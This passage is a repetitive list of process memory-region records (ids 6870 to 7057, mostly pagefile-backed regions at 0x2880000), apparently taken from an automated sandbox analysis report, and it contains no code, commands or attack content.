region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6870 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6871 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6872 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6873 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6874 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6875 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6876 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6877 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6878 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6879 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6880 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6881 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6882 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6883 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6884 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6885 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6886 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6887 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6888 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6889 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6890 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6891 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6892 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6893 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6894 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6895 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6896 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6897 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6898 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6899 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6900 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6901 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6902 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6903 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6904 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6905 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6906 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6907 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6908 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6909 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6910 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6911 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6912 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6913 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6914 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6915 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6916 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6917 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6918 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6919 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6920 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6921 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6922 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6923 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6924 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 6925 start_va = 0x4120000 end_va = 0x413ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 6926 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6927 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6928 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6929 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6930 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6931 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6932 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6933 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6934 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6935 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6936 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6937 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6938 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6939 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6940 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6941 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6942 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6943 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6944 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6945 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6946 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6947 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6948 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6949 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6950 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6951 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6952 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6953 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6954 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6955 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6956 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6957 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6958 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6959 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6960 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6961 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6962 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6963 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6964 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6965 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6966 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6967 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6968 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6969 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6970 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6971 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6972 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6973 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6974 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6975 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6976 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6977 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6978 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6979 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6980 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6981 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6982 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6983 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6984 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6985 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6986 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6987 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6988 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6989 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6990 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6991 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6992 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6993 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6994 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6995 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6996 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6997 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6998 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6999 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7000 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7001 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7002 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7003 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7004 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7005 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7006 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7007 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7008 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7009 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7010 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7011 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7012 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7013 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7014 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7015 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7016 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7017 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7018 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7019 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7020 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7021 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7022 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7023 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7024 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7025 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7026 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7027 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7028 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7029 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7030 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7031 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7032 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7033 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 7034 start_va = 0x4120000 end_va = 0x413ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 7035 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7036 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7037 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7038 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7039 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7040 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7041 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7042 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7043 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7044 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7045 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7046 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7047 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7048 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7049 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7050 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7051 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7052 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7053 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7054 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7055 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7056 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7057 start_va = 0x2880000 end_va = 0x288efff monitored = 1 